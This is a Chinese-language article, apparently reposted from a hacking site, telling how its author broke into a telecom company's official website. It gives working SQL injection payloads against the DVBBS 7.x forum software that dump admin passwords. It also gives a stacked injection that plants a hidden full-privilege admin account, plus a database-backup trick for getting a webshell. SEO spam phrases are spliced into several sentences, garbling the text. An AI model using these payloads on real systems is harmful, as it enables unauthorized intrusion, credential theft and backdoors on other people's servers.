高手是如何渗透一电信官方站点的

来源:未知 浏览 121次 时间 2021-06-09 02:38

一、踩点:
XX电信的站点这个站是我一直都想拿下的首页存在注入点SEO排名服务首页存在注入点是sa 登陆数据库是放另一外网的主机那台主机禁止对外连接但是可以上网对外不开放端口。
为其论谈是access dvbbs7.0 sp2.

二、拿下aspshell
动网前台提权的方法我就不多说了jinsdb给的工具很快就提完前台。不抓图继续. 得到前台后就是对拿后台。动网recycle.asp过滤不严导致注入漏洞的存在先说一下,漏洞不是我发现的构造注入点如下:
?tablename=Dv_bbs1 union select 1,2,l_content,4,5,6 from dv_log where l_id0 union select 1,1,1,1,1,1 from dv_bbs1page=7

这里要注意的是这个漏洞的前提是以前台管理员身份登陆对access和mssql的dvbbs 7.x通杀通过上面的构造就可以暴出l_content的内容。这里还要说的是最后面的page=7通过上面的注入语句是暴出所有l_content的值但是动网一个界面只能显示10多条所以大家通过修改page的值来找l_content的内容一般是在最后几个数字SEO关键词一般是在最后几个数字这个page是回收站的页数如果一共有130页你一般从120开始这样通过121122
,一直累注上去直到找出password的明文如果你懂点sql的话当然也可以用来暴管理员的散列只是变换一下注入语句而已如:
?tablename=Dv_bbs1 union select 1,2,password,4,5,6 from dv_admin where password0 union select 1,1,1,1,1,1 from dv_bbs1page=7

利用上面的注射方式可以暴出l_content的值当然如果你想暴dv_admin的话只要构造一下注射语句就可以了。利用这种注册很快暴出前后台的账号和密码。

而对于sql方法更多动网的其它文件也存在注入漏洞如:先查看一下随便一个用户的资料在最下面的奖惩处点一下接着在操作理由里输入:
test 没有对用户进行分值操作’,’127.0.0.1’,5) ;insert into dv_admin (username,[password],flag,adduser) values (’linzi123’,’7412b5da7be0cf42’,’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37’,’linzi123’);--

这样在后台就加了一个linzi123的用户。进到后台后sql的和access在备份的地方有些不同偶给大家一个备份得shell的文件databack.htm.
打开他的源代码找到语句
form method="post" action="http://目标主机/ADMIN_data.asp?action=BackupDataact=Backup"
把目标主机换成你已经进入后台的url就可以了如,接下来就和access的一样了方法我就不多说了。
当然你也可以利用backup a shell在国内几个商业黑客站点里有文章介绍。但是要注意的是要看权限public权限就别想的了至少我是无法做到。

高手是如何渗透一电信官方站点的

标签: 权限一下主机一个